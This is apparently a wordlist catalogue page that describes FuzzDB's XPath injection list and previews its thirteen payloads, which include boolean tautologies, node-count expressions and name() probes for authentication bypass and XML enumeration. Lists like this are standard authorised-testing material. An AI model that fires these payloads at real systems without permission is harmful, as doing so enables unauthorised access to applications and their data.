Skip to content
Fuzzing209 B

FuzzDB XPath Injection

XPath injection payloads using boolean tautologies, node-count expressions, and name() probes to bypass authentication and enumerate XML document structure.

View source
Size
209 B
Category
Fuzzing
Source
fuzzdb-project/fuzzdb
License
GPLv2
Recommended tools
ffufwfuzzburp

Preview

First 13 entries. Download or copy the full list (209 B) using the buttons above.

>head xpath-injection-fuzzdb.txt209 B
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1

XPath injection payloads using boolean tautologies, node-count expressions, and name() probes to bypass authentication and enumerate XML document structure.

This list is geared toward input fuzzing and vulnerability discovery. It contains roughly 209 B and pairs well with tools such as ffuf, wfuzz, burp. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.

You can copy the sample preview straight from this page, copy the entire list to your clipboard, or download the raw .txt file. The full list is served directly from its upstream source on GitHub.

Sourced from fuzzdb-project/fuzzdb and distributed under GPLv2. Only use wordlists against systems you are explicitly authorized to test.